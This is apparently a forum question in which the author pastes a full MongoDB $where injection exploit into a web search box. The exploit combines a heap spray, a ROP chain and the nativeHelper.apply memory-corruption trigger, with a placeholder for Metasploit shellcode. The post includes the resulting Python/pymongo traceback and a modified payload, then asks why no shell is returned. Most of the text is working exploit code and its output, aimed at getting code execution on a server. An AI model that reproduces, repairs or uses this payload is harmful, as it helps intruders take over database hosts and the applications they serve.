I know I can submit input through a search box that queries the MongoDB instance. I have updated the code with my own shellcode, but I won't include that here; I will just show the exploit as it is:
db.my_collection.find({'$where':'shellcode=unescape("METASPLOIT JS GENERATED SHELLCODE"); sizechunk=0x1000; chunk=""; for(i=0;i<sizechunk;i++){ chunk+=unescape("%u9090%u9090"); } chunk=chunk.substring(0,(sizechunk-shellcode.length)); testarray=new Array(); for(i=0;i<25000;i++){ testarray[i]=chunk+shellcode; } ropchain=unescape("%uf768%u0816%u0c0c%u0c0c%u0000%u0c0c%u1000%u0000%u0007%u0000%u0031%u0000%uffff%uffff%u0000%u0000"); sizechunk2=0x1000; chunk2=""; for(i=0;i<sizechunk2;i++){ chunk2+=unescape("%u5a70%u0805"); } chunk2=chunk2.substring(0,(sizechunk2-ropchain.length)); testarray2=new Array(); for(i=0;i<25000;i++){ testarray2[i]=chunk2+ropchain; } nativeHelper.apply({"x" : 0x836e204}, ["A"+"\x26\x18\x35\x08"+"MongoSploit!"+"\x58\x71\x45\x08"+"sthack is a nice place to be"+"\x6c\x5a\x05\x08"+"\x20\x20\x20\x20"+"\x58\x71\x45\x08"]);'})
When this is entered into the search box and reaches the database, I get a Python error that looks like this:
/usr/lib/cgi-bin/mongo/2.2.3/dbparse.py in () 41 print "</th>" 42 if where: => 43 for record in collection.find(where): 44 print "<tr>" 45 print "<td align=\"center\">"+record["CompanyName"]+"</td>" record undefined, collection = Collection(Database(MongoClient('localhost', 27017), u'test_database'), u'london_garages'), collection.find = <bound method Collection.find of Collection(Data...', 27017), u'test_database'), u'london_garages')>, where = {'$where': 'this.CompanyName == \'db.my_collection.find({\'$wh...x08"+"\\x20\\x20\\x20\\x20"+"\\x58\\x71\\x45\\x08"]);\'})\''} /usr/local/lib/python2.7/dist-packages/pymongo/cursor.py in next(self=<pymongo.cursor.Cursor object>) 812 raise StopIteration 813 db = self.__collection.database => 814 if len(self.__data) or self._refresh(): 815 if self.__manipulate: 816 return db._fix_outgoing(self.__data.popleft(), builtin len = <built-in function len>, self = <pymongo.cursor.Cursor object>, self.__data undefined, self._refresh = <bound method Cursor._refresh of <pymongo.cursor.Cursor object>> /usr/local/lib/python2.7/dist-packages/pymongo/cursor.py in _refresh(self=<pymongo.cursor.Cursor object>) 761 self.__skip, ntoreturn, 762 self.__query_spec(), self.__fields, => 763 self.__uuid_subtype)) 764 if not self.__id: 765 self.__killed = True self = <pymongo.cursor.Cursor object>, self.__uuid_subtype undefined /usr/local/lib/python2.7/dist-packages/pymongo/cursor.py in __send_message(self=<pymongo.cursor.Cursor object>, message=(-720441271, '\xb1\x03\x00\x00I\xf0\x0e\xd5\x00\x00\x00\x00\xd4\x07\x00\x00\x00\x00\x00\x00test_database.london_garages...8"+"\\x20\\x20\\x20\\x20"+"\\x58\\x71\\x45\\x08"]);\'})\'\x00\x00', 888)) 718 self.__as_class, 719 self.__tz_aware, => 720 self.__uuid_subtype) 721 except AutoReconnect: 722 # Don't send kill cursors to another server after a "not master" self = <pymongo.cursor.Cursor object>, self.__uuid_subtype undefined /usr/local/lib/python2.7/dist-packages/pymongo/helpers.py in 
_unpack_response(response="\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00.\x00\x00\x00\x02$err\x00\x15\x00\x00\x00$where compile error\x00\x10code\x00V'\x00\x00\x00", cursor_id=None, as_class=<type 'dict'>, tz_aware=False, uuid_subtype=3) 97 raise AutoReconnect(error_object["$err"]) 98 raise OperationFailure("database error: %s" % => 99 error_object["$err"]) 100 101 result = {} error_object = {u'$err': u'$where compile error', u'code': 10070}
I understand that this error arises because the database is already applying part of the query logic ahead of my input, so I amended my input to look like this:
unescape("METASPLOIT JS GENERATED SHELLCODE"); sizechunk=0x1000; chunk=""; for(i=0;i<sizechunk;i++){ chunk+=unescape("%u9090%u9090"); } chunk=chunk.substring(0,(sizechunk-shellcode.length)); testarray=new Array(); for(i=0;i<25000;i++){ testarray[i]=chunk+shellcode; } ropchain=unescape("%uf768%u0816%u0c0c%u0c0c%u0000%u0c0c%u1000%u0000%u0007%u0000%u0031%u0000%uffff%uffff%u0000%u0000"); sizechunk2=0x1000; chunk2=""; for(i=0;i<sizechunk2;i++){ chunk2+=unescape("%u5a70%u0805"); } chunk2=chunk2.substring(0,(sizechunk2-ropchain.length)); testarray2=new Array(); for(i=0;i<25000;i++){ testarray2[i]=chunk2+ropchain; } nativeHelper.apply({"x" : 0x836e204}, ["A"+"\x26\x18\x35\x08"+"MongoSploit!"+"\x58\x71\x45\x08"+"sthack is a nice place to be"+"\x6c\x5a\x05\x08"+"\x20\x20\x20\x20"+"\x58\x71\x45\x08"]);
This doesn't return an error, but no shell comes back either. Could I be omitting some characters here that prevent my code from executing? Another concern is that removing the assignment to `shellcode` may affect other parts of the code, for instance where `shellcode` is referenced again when building `testarray`.